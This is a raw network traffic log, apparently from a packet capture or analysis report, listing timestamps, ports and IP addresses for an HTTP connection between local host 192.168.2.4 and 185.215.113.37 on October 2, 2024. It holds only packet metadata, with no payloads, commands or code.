Oct 2, 2024 18:19:20.091447115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091464043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091486931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091533899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091548920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091577053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091586113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091599941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091612101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.091622114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091653109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.091996908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092026949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092045069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092052937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092063904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092080116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092180014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092194080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092221022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092230082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092242002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092257023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092263937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092304945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092324018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092338085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092365026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092374086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092386007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092402935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092904091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.092958927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.092982054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093000889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093029976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093039989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093137026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093151093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093180895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093187094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093198061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093209982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093260050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093280077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093292952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093308926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093327045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093338966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093348026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093379021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093854904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093908072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093934059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093947887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.093981028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.093991995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094024897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094038963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094069004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094074965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094085932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094096899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094105959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094137907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094198942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094213009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094238997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094248056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094259024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094274044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094793081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094820976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094837904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094845057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094858885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094891071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.094944000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094958067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094990015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.094995975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.095005035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.095021963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.095029116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.095068932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101272106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101306915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101325989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101332903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101341963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101363897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101398945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101413012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101438046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101448059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101460934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101475000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101481915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101521015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101533890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101567030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101577997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101603985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101628065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101641893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101676941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101686954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101712942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101731062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101757050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.101763010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101773977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.101795912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.181886911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.181919098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.181931973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.181979895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.181992054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182022095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182037115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182060957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182073116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182090998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182104111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182128906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182140112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182163954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182199955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182213068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182282925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182295084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182312965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182327986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182347059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182358027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182377100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182400942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.182414055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182430029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.182444096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222650051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222662926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222690105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222709894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222724915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222749949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222767115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222827911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222877026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222899914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222915888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.222963095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.222963095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223028898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223042965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223057032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223071098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223112106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223135948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223165989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223180056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223205090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223212957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223221064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223241091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223253012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223268986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223290920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223300934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223418951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223433018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223457098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223474026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223486900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223495960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223551989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223576069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223589897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223618031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223623991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223633051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223653078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223664999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223711014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223721981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223736048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223771095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223778009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223797083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223808050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223825932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223834991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223860025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223867893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223906994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.223980904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.223994970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224021912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224030972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224047899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224062920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224124908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224138975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224165916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224179029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224199057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224205971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224246025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224260092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224286079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224292994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224302053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224349976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224373102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224385977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224411011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224419117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224435091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224451065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224523067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224536896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224572897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224579096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224597931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224615097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224622011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224638939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224647045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224657059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224678040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224704027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224713087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224792004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224829912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224853039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224883080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224895000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224908113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224931955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224940062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.224947929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.224975109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227592945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227665901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227674007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227690935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227711916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227720976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227750063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227766991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227777958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227792025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227816105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227823973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227847099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227853060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227889061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.227960110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227974892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.227999926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228009939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228025913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228034973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228054047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228072882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228081942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228091002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228121042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228131056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228171110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228193045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228219032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228238106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228252888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228369951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228419065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228429079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228442907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228467941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228477001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228487968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228516102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228524923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228557110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228615046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228627920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228656054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228682995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228703022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228723049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228739023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228804111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228830099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228843927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228888035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228905916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228914976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228940010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228951931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.228967905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.228990078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229008913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229085922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229099989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229125023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229135036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229151964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229160070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229167938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229201078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229274035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229288101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229319096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229330063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229338884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229351997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229362011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229377985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229402065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229408979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229418039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229444981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229451895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229465961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229485989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229505062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229656935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229702950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229710102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229728937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.229746103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229764938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.229782104 CEST	80	49737	185.215.113.37	192.168.2.4
